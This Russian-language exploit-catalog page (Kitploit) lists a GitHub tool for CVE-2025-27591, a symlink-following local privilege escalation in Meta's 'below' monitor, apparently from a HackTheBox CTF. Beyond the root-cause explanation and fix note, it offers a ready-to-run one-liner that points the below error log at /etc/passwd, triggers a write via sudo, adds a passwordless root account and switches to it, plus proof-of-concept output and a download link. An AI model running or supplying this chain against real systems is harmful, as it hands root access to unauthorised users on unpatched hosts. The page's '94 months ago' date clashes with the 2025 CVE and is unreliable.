Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-27591-Meta-below-LPE — CVE-2025-27591 – Meta below symlink following локальное повышение привилегий (HackTheBox CTF) | Kitploit
Инструменты/GitHubGitHub/rippsec/cve-2025-27591-meta-below-lpe
Повышение привилегийАнализ уязвимостейЭксплуатацияЛатеральное перемещениеCTFЭксплуатация Бинарных Файлов
GitHubrippsec/cve-2025-27591-meta-below-lpe

CVE-2025-27591-Meta-below-LPE

CVE-2025-27591 – Meta below symlink following локальное повышение привилегий (HackTheBox CTF)

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
94 месяцев назадЕщё не проверено

CVE-2025-27591 — Meta below — повышение локальных привилегий через симлинк

Обзор

ПолеПодробности
CVECVE-2025-27591
Программное обеспечениеMeta below (монитор системных ресурсов)
Затронутые версии< 0.9.0
УязвимостьСледование за симлинком → произвольная перезапись файла от root
АутентификацияЛокальный пользователь с доступом sudo к below
ВоздействиеЛокальное повышение привилегий до root
КонтекстОбнаружено во время CTF на HackTheBox

Описание

Инструмент мониторинга системных ресурсов below (от Meta Platforms, Inc.) содержит ошибку в механизме журналирования ошибок. При вызове через sudo он принудительно устанавливает права 0666 на свои файлы журналов, расположенные в /var/log/below/, без предварительной проверки, является ли целевой путь симлинком. Это позволяет локальному злоумышленнику заменить файл журнала на симлинк, указывающий на любой файл, доступный для записи от root, тем самым перезаписывая его контролируемым содержимым.

Технические детали

Корневая причина

Код журналирования в below < 0.9.0 при запуске от root выполняет следующие операции по порядку:

  1. Определяет путь к журналу: /var/log/below/error_root.log
  2. Создаёт или открывает файл
  3. Вызывает chmod(path, 0o666) — без проверки, является ли он симлинком
  4. Записывает сообщение об ошибке по указанному пути

Цепочка эксплуатации

root@kitploit:~
Local user
    │
    ▼
Remove /var/log/below/error_root.log
    │
    ▼
Create symlink: /var/log/below/error_root.log → /etc/passwd
    │
    ▼
Trigger error via: sudo /usr/bin/below replay --time "invalid"
    │  (below opens the "log file", chmod 0666 hits /etc/passwd, writes error)
    ▼
/etc/passwd is now world-writable
    │
    ▼
Append rogue root entry: rooted::0:0:root:/root:/bin/bash
    │
    ▼
su rooted → root shell

Почему работает --time "invalid"

Передача недопустимой строки времени заставляет below записать сообщение об ошибке. Путь обработки ошибки достигает кода журналирования, который слепо записывает в файл, который теперь является нашим симлинком.

Использование

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Предварительное условие: Текущий пользователь должен иметь права sudo для выполнения /usr/bin/below.

Однострочник

root@kitploit:~
rm -f /var/log/below/error_root.log; \
ln -s /etc/passwd /var/log/below/error_root.log; \
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1; \
echo 'rooted::0:0:root:/root:/bin/bash' > /var/log/below/error_root.log; \
su rooted

Подтверждение концепции

root@kitploit:~
$ whoami
lowpriv
$ ./exploit.sh
# whoami
root

Исправление

Уязвимость была исправлена в версии below 0.9.0. Исправление добавляет проверку на симлинк перед любыми файловыми операциями в пути журналирования.

Ссылки

  • Запись NVD
  • Meta below на GitHub
Скачать инструмент